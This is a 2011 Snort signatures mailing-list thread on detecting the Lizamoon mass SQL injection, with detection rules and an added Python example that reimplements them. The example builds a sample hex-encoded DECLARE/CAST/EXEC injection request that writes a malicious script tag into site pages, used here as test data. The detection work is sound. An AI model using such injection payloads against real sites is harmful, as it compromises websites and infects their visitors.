As it turns out, SID 13989 will detect the injection attack.<div><br></div><div>Our honeypots had noticed some interesting data around that rule, and around the same time we noticed this posting:</div><div><br></div><div><a href="http://stackoverflow.com/questions/3788080/attack-on-asp-site-that-uses-a-sql-server-database">http://stackoverflow.com/questions/3788080/attack-on-asp-site-that-uses-a-sql-server-database</a></div>
<div><br></div><div>It's pretty clear that the query shown on that page is what's being used to spread this. Additionally, Jason, props to you for recognizing that a rule should skip the domain, since a link off of the above page shows live attacks have used distinct domains; the rule you've posted above will work in the wild. </div>
<div><br></div><div>For what it's worth, SID 13989 is disabled by default, since it was considered somewhat experimental when it was written. Since it did a pretty good job of detecting ASPRox, and now this Lizamoon thing, we may consider putting it into some policies for people - though I'd be curious to get feedback from the list on that.<br>
<div><br><div class="gmail_quote">On Thu, Mar 31, 2011 at 6:26 PM, Joel Esler <span dir="ltr"><<a href="mailto:jesler@...435...">jesler@...3451...5...</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">
<div>
            <div><span>Might be interesting either way.  To see if one of your users was browsing to a compromised site, but also interesting to see an outbound one ($HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any) to see if one of your sites was compromised.</span></div>
<div><span><br></span></div><div><span><br>
                </span>
                <span><br>-- <br><font color="#888888">Joel Esler<br><div><a href="http://blog.snort.org" target="_blank">http://blog.snort.org</a> | <a href="http://vrt-blog.snort.org" target="_blank">http://vrt-blog.snort.org</a></div>
<div>Twitter: <a href="http://twitter.com/snort" target="_blank">http://twitter.com/snort</a></div><br></font></span><div><div></div><div class="h5">
                
                
                <p style="color:#a0a0a0">On Thursday, March 31, 2011 at 6:17 PM, Alex Kirk wrote:</p>
                <blockquote type="cite" style="border-left-style:solid;border-width:1px;margin-left:0px;padding-left:10px">
<span><div><div>Detecting compromised pages should be trivial:<div><br></div><div>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"SPECIFIC-THREATS lizamoon.com SQL injection compromised page"; flow:established,to_client; content:"script src=http|3A 2F 2F|lizamoon.com|2F|ur.php"; nocase; classtype:trojan-activity;)</div>

<div><br></div><div>We can toss that into an upcoming SEU, given its growing prevalence.<br><br><div>On Thu, Mar 31, 2011 at 6:08 PM, Jason Haar <span dir="ltr"><<a href="mailto:Jason.Haar@...651..." target="_blank">Jason.Haar@...651...</a>></span> wrote:<br>
<blockquote type="cite"><div>Hi there<br>
<br>
As you are all no doubt aware, the "lizamoon" SQL injection attack has<br>
already hacked over 380,000 URLs. Does anyone know if Snort picks it via<br>
one of its existing rules, and if not, has anyone written one?<br>
<br>
Thanks<br>
<br>
<a href="http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx" target="_blank">http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx</a><br>


<br>
--<br>
Cheers<br>
<br>
Jason Haar<br>
Information Security Manager, Trimble Navigation Ltd.<br>
Phone: +64 3 9635 377 Fax: +64 3 9635 417<br>
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1<br>
<br>
<br>
------------------------------------------------------------------------------<br>
Create and publish websites with WebMatrix<br>
Use the most popular FREE web apps or write code yourself;<br>
WebMatrix provides all the features you need to develop and<br>
publish your website. <a href="http://p.sf.net/sfu/ms-webmatrix-sf" target="_blank">http://p.sf.net/sfu/ms-webmatrix-sf</a><br>
_______________________________________________<br>
Snort-sigs mailing list<br>
<a href="mailto:Snort-sigs@lists.sourceforge.net" target="_blank">Snort-sigs@lists.sourceforge.net</a><br>
<a href="https://lists.sourceforge.net/lists/listinfo/snort-sigs" target="_blank">https://lists.sourceforge.net/lists/listinfo/snort-sigs</a><br>
<a href="http://www.snort.org" target="_blank">http://www.snort.org</a><br>
</div></blockquote></div><br><br clear="all"><br>-- <br>Alex Kirk<br>AEGIS Program Lead<br>Sourcefire Vulnerability Research Team<br>+1-410-423-1937<br><a href="mailto:alex.kirk@...435..." target="_blank">alex.kirk@...3395...35...</a><br>


</div>
</div>
</div></span>
                
                
                
                
                </blockquote>
                
                <div>
                    <br>
                </div>
            </div></div></div>
        </div></blockquote></div><br><br clear="all"><br>-- <br>Alex Kirk<br>AEGIS Program Lead<br>Sourcefire Vulnerability Research Team<br>+1-410-423-1937<br><a href="mailto:alex.kirk@...435...">alex.kirk@...435...</a><br>

</div></div>
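<div><br></div><div>The detection logic the thread converges on, as an added example that is not code from the thread, from Sourcefire, or from any Snort ruleset: a Python re-implementation of the posted lizamoon.com content match, the domain-agnostic variant Jason refers to (the injected tag always ends in <code>/ur.php</code>, the domain rotates), the outbound direction Joel suggests for catching your own compromised servers, and a decoder for the injection request itself. The $HOME_NET prefixes, the sample HTTP responses and the attack request are constructed here; the DECLARE/CAST/EXEC hex-encoded form of the injection query is an assumption about the query linked above (the page does not show it or the content of SID 13989), so treat that part as illustrating the ASPRox-style technique rather than the exact Lizamoon payload.</div>

```python
import re
from dataclasses import dataclass
from typing import Optional

# --- Constructed test environment (stands in for $HOME_NET) -----------------
HOME_NET_PREFIXES = ("10.0.0.", "192.168.1.")   # assumption: two RFC1918 ranges

def in_home_net(ip: str) -> bool:
    return ip.startswith(HOME_NET_PREFIXES)

@dataclass
class HttpResponse:
    src: str     # web server: source of the to_client response
    dst: str     # browser that requested the page
    body: bytes  # response body as seen on the wire

# --- The rule as posted, as a plain content match ---------------------------
# content:"script src=http|3A 2F 2F|lizamoon.com|2F|ur.php"; nocase;
# |3A 2F 2F| and |2F| are just "://" and "/" spelled as hex bytes.
LIZAMOON_CONTENT = b"script src=http://lizamoon.com/ur.php"

def matches_posted_rule(body: bytes) -> bool:
    return LIZAMOON_CONTENT in body.lower()   # nocase

# --- Domain-agnostic variant: match any <script src=http://X/ur.php> --------
UR_PHP_RE = re.compile(rb"script\s+src=['\"]?http://([a-z0-9.-]+)/ur\.php", re.I)

def injected_domain(body: bytes) -> Optional[str]:
    """Return the domain the injected tag loads from, or None if absent."""
    m = UR_PHP_RE.search(body)
    return m.group(1).decode("ascii").lower() if m else None

def classify(resp: HttpResponse) -> list:
    """Both directions from the thread: inbound (a user browsed to a compromised
    site) and outbound (one of our own servers is serving the injected tag)."""
    alerts = []
    dom = injected_domain(resp.body)
    if dom is None:
        return alerts
    # $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
    if not in_home_net(resp.src) and in_home_net(resp.dst):
        alerts.append(f"inbound: {resp.dst} fetched page injected with {dom}/ur.php")
    # $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any
    if in_home_net(resp.src) and not in_home_net(resp.dst):
        alerts.append(f"outbound: our server {resp.src} is serving {dom}/ur.php")
    return alerts

# --- The injection request itself (assumed ASPRox-style form) ---------------
#   DECLARE @S NVARCHAR(4000);SET @S=CAST(0x<hex> AS NVARCHAR(4000));EXEC(@S);
# The real UPDATE statement is hidden inside <hex> (UTF-16LE for NVARCHAR,
# single-byte for VARCHAR) so that keyword filters never see "UPDATE" or
# "<script". Decoding it shows what gets written into every text column.
CAST_RE = re.compile(r"CAST\(0x([0-9a-f]+)\s+AS\s+(N?)VARCHAR", re.I)

def decode_cast_payload(request_line: str) -> Optional[str]:
    m = CAST_RE.search(request_line)
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    return raw.decode("utf-16-le" if m.group(2) else "latin-1")

def is_mass_injection(request_line: str) -> bool:
    decoded = decode_cast_payload(request_line)
    return decoded is not None and "ur.php" in decoded.lower()

# --- Constructed samples ----------------------------------------------------
INJECTED_UPDATE = ("UPDATE pages SET body = body + "
                   "'<script src=http://lizamoon.com/ur.php></script>'")
SAMPLE_ATTACK_REQUEST = (
    "GET /item.asp?id=1;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x"
    + INJECTED_UPDATE.encode("utf-16-le").hex()
    + " AS NVARCHAR(4000));EXEC(@S);-- HTTP/1.1")
SAMPLE_RESPONSES = [
    HttpResponse("203.0.113.10", "10.0.0.5",
                 b"<html><script src=http://lizamoon.com/ur.php></script></html>"),
    HttpResponse("192.168.1.20", "198.51.100.7",
                 b'<html><SCRIPT SRC="http://other-host.example/ur.php"></SCRIPT>'),
    HttpResponse("203.0.113.10", "10.0.0.5", b"<html>clean page</html>"),
]

if __name__ == "__main__":
    print("decoded injection:", decode_cast_payload(SAMPLE_ATTACK_REQUEST))
    for r in SAMPLE_RESPONSES:
        print(r.src, "->", r.dst, classify(r) or "no alert")
```

<div><br></div><div>Note that the second sample response would be missed by the posted rule (different domain) but caught by the /ur.php variant, and that it fires in the outbound direction only because the serving host is inside the constructed $HOME_NET; when you turn this back into Snort rules you still need a <code>sid</code>/<code>rev</code> on each and should keep the two directions as separate rules so the alert tells you which side is compromised.</div>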